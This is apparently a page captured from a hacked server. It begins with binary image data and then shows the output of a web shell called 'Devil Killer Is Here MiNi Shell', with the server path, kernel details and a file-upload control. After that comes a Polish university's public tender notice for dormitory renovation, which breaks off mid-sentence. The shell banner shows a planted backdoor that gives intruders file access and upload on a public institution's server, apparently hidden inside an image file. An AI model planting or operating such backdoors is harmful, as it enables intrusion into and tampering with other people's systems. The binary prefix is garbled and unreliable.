JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211013/0023155102-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty remontowe w budynku DS. Rzepicha. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Zielonogórski</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Biuro Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 977924147</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Licealna 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-417</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">785011388</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@uz.zgora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uz.zgora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty remontowe w budynku DS. Rzepicha. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-67946fef-2c11-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231551</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000184/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Remont parteru DS Rzepicha</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.adm.uz.zgora.pl/przetargi/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.adm.uz.zgora.pl/przetargi/https://epuap.gov.pl/wps/portalhttps://miniportal.uzp.gov.pl/<br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty elektroniczne przekazuje się przy użyciu środków komunikacji elektronicznej wskazanych<br/>przez Zamawiającego w niniejszym punkcie, odpowiednio dla danych czynności. (art. 67) (RE 3.1)<br/>1. Informacje ogólne:<br/>1) komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem poczty<br/>elektronicznej na następujący adres email: bzp@uz.zgora.pl, miniPortalu, który jest dostępny pod<br/>adresem: https://miniportal.uzp.gov.pl/ i ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal, z zastrzeżeniem pkt. 2) i 3) poniżej;<br/>2) składanie i wycofanie ofert odbywa się za pośrednictwem miniPortalu i ePUAPu (łącznie);<br/>3) komunikacja między Zamawiającym a Wykonawcami, we wszystkich innych sprawach niż składanie i<br/>wycofanie ofert, odbywa się za pośrednictwem poczty elektronicznej na następujący adres email:<br/>bzp@uz.zgora.pl;<br/>4) MiniPortal i ePUAP służą WYŁACZNIE do składania i wycofywania ofert. Wszelka pozostała<br/>korespondencja (w tym również: pytania do treści SWZ, wezwania do wyjaśnień i uzupełnień, dokumenty, wyjaśnienia i informacje składane przez Wykonawcę na wezwanie) przekazywana będzie<br/>za pomocą poczty elektronicznej na wskazany wyżej w pkt. 3) adres email;<br/>5) osobą uprawnioną do kontaktowania się z Wykonawcami jest: mgr inż. Arkadiusz Łuszczyński,<br/>email: bzp@uz.zgora.pl tel. 785 011 388, (Biuro Zamówień Publicznych), a w przypadku jego<br/>nieobecności inny pracownik Biura Zamówień Publicznych;<br/>6) Wykonawca zamierzający wziąć udział w przedmiotowym postępowaniu o udzielenie zamówienia<br/>publicznego musi posiadać konto na ePUAP. Składanie i wycofanie oferty następuje wyłącznie poprzez<br/>dostępny tam Formularz do złożenia, zmiany, wycofania oferty lub wniosku;<br/>7) wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów oraz informacji przekazywanych przy ich użyciu zostały opisane w<br/>Regulaminie korzystania z systemu miniPortal i Instrukcjach oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej( ePUAP). Zainteresowany złożeniem oferty<br/>wykonawca winien zapoznać się z aktualnymi wytycznymi technicznymi zawartymi w ww. Regulaminie,<br/>Instrukcjach i Warunkach. Przystąpienie do postępowania jest równoznaczne z akceptacją warunków<br/>korzystania z miniPortalu i ePUAPu;<br/>8) maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB;<br/>9) strona internetowa postępowania jest jednocześnie stroną, na której udostępniane będą zmiany i<br/>wyjaśnienia SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem.<br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Parlamentu Europejskiego i Rady 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”<br/>oraz ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych, z uwzględnieniem przepisów<br/>ustawy Prawo zamówień publicznych i innych obowiązujących Zamawiającego przepisów prawnych.<br/>2) Udział Wykonawcy w przedmiotowym postępowaniu o udzielenie zamówienia publicznego jest<br/>dobrowolny, a przystępując do tego postępowania Wykonawca akceptuje wszystkie obowiązki i<br/>konsekwencje wynikające z obowiązujących przepisów prawnych.<br/>3) Wszystkie dane osobowe przekazywane Zamawiającemu w trakcie przedmiotowej procedury<br/>Wykonawca zobowiązany jest uzyskiwać zgodnie z przepisami RODO.<br/>4) Wykonawca, w zakresie danych osobowych przekazywanych Zamawiającemu w trakcie<br/>przedmiotowej procedury, zobowiązany jest wykonać wszystkie obowiązki informacyjne przewidziane<br/>w art. 13/ w art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub<br/>pośrednio pozyskuje w celu ubiegania się o udzielenie zamówienia w niniejszym postępowaniu, w tym<br/>w szczególności w zakresie wszystkich obowiązków informacyjnych i uzyskania zgód. Obowiązek ten<br/>dotyczy wszystkich dokumentów i wszystkich osób (Wykonawcy, pracowników Wykonawcy,<br/>pracowników i członków uczestników konsorcjów, podmiotów trzecich, itp.), w całym okresie trwania<br/>procedury.<br/>5) Zgodnie z art. 13 ust. 1 i 2 i art. 14 ust. 1 i 2 RODO, Zamawiający informuje, że w przedmiotowym<br/>postępowaniu:<br/>1) administratorem danych osobowych jest Zamawiający - Uniwersytet Zielonogórski, 65-417 Zielona<br/>Góra, ul. Licealna 9; REGON 977924147; tel. 68-328-2000, fax: 68-327-0735; www.uz.zgora.pl;<br/>2) inspektorem danych osobowych u Zamawiającego jest Pan Jerzy Rybicki; IOD@adm.uz.zgora.pl tel.<br/>603474724;<br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie http://www.adm.uz.zgora.pl/przetargi/.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RA-ZP.2612.64.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie na rzecz Zamawiającego, robót budowlanych dla zadania pn.: „Roboty remontowe w budynku DS. Rzepicha”, zadanie realizowane będzie na Campusie A, Dom Studenta „Rzepicha”: ul. Podgórna 50b, 65-516 Zielona Góra. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">75 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie zdolności technicznej lub zawodowej:<br/>Wykonawcy ubiegający się o realizację przedmiotowego zamówienia muszą dysponować osobami zdolnymi do wykonania zamówienia objętego przedmiotowym postępowaniem. W celu wykazania spełniania warunku Wykonawcy zobowiązani są dysponować:<br/>- wykwalifikowanym personelem inżynieryjno-technicznym, posiadającym uprawnienia budowlane do pełnienia funkcji Kierownika Budowy w specjalności konstrukcyjno-budowlanej, pozwalające na kierowanie robotami budowlanymi objętymi przedmiotem zamówienia. Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania Wykonawcy zobowiązani są złożyć:<br/>1)	„Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu” – aktualne na dzień składania ofert, sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 4 do SWZ, <br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">„Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu” – aktualne na dzień składania ofert, sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 4 do SWZ, <br/><br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymagania w tym zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1)	odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:<br/>­- nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z procedury przewidzianej w przepisach miejsca wszczęcia tej procedury - wystawione nie wcześniej niż 3 miesiące przed jego/ich złożeniem;<br/>2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, zastępuje się je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie<br/>Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju,<br/>w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Dokumenty, o których mowa w zdaniu poprzednim powinny zostać wystawione (sporządzone) zgodnie z odpowiednimi terminami wskazanymi w pkt. 4 powyżej.<br/>Stosowne oświadczenia muszą mieć terminy sporządzenia odpowiadające terminom<br/>wymaganym od dokumentów, które zastępują.<br/>3. Jeśli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>podczas wykazywania spełniania warunków udziału w postępowaniu określonych na podstawie<br/>art. 112 ust.2 ustawy (jeśli Zamawiający stawia takie warunki), zobowiązany jest wykazać brak<br/>podstaw do wykluczenia tych podmiotów w zakresie takim, który jest przewidziany względem<br/>Wykonawcy. Wykonawca zobowiązany jest złożyć Zamawiającemu wraz z ofertą Oświadczenia<br/>o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu dotyczący<br/>każdego z tych podmiotów. Oświadczenia dotyczące tych podmiotów powinny potwierdzać brak<br/>podstaw do wykluczenia tych podmiotów w takim samym zakresie, jak zakres wymagany od<br/>Wykonawcy oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na zasoby danego podmiotu.<br/>Oświadczenia dotyczące podmiotów udostępniających zasoby muszą być wypełnione i<br/>podpisane przez te podmioty, zgodnie z zasadami ich reprezentacji (odrębny dokument dla<br/>każdego podmiotu). Oświadczenia te Wykonawca przekazuje Zamawiającemu wraz z ofertą.<br/>(art. 125 ust. 5)<br/>4. Jeśli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby na<br/>zasadach określonych w art. 118 Ustawy, Zamawiający nie żąda od tego Wykonawcy<br/>przedstawienia, w odniesieniu do tych podmiotów, podmiotowych środków dowodowych,<br/>dotyczących tych podmiotów, na potwierdzenie braku podstaw ich wykluczenia, takich jakie są<br/>żądane od Wykonawcy w pkt. 3 powyżej. (R 5.1)<br/>Szczegółowe informacje znajdują się w dokumentach zamówienia na stronie<br/>http://www.adm.uz.zgora.pl/przetargi/. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> I. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>2. Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za realizację umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy (jeśli zamawiający żąda takiego zabezpieczenia).<br/>5. Spółkę cywilną należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>6. Zamawiający nie określa szczególnego sposobu spełniania przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu.<br/>7. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Ustawy jest spełniony, jeżeli co najmniej<br/>jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>9. W przypadku, o którym mowa w pkt. 8 i 9 powyżej , Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>10. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia przekazuje<br/>Zamawiającemu oświadczenie o braku przynależności do tej samej Grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów , z innym<br/>wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej. Oświadczenie należy sporządzić zgodnie ze wzorem<br/>stanowiącym załącznik do SWZ – jeśli dotyczy.<br/>11. Zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w<br/>odniesieniu do pojedynczych Wykonawców.<br/>12. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań<br/>dotyczących zamówień na roboty budowlane lub usługi/ prac związanych z rozmieszczeniem i<br/>instalacją w ramach zamówienia na dostawy.<br/>II. Każdy z Wykonawców wspólnie ubiegających 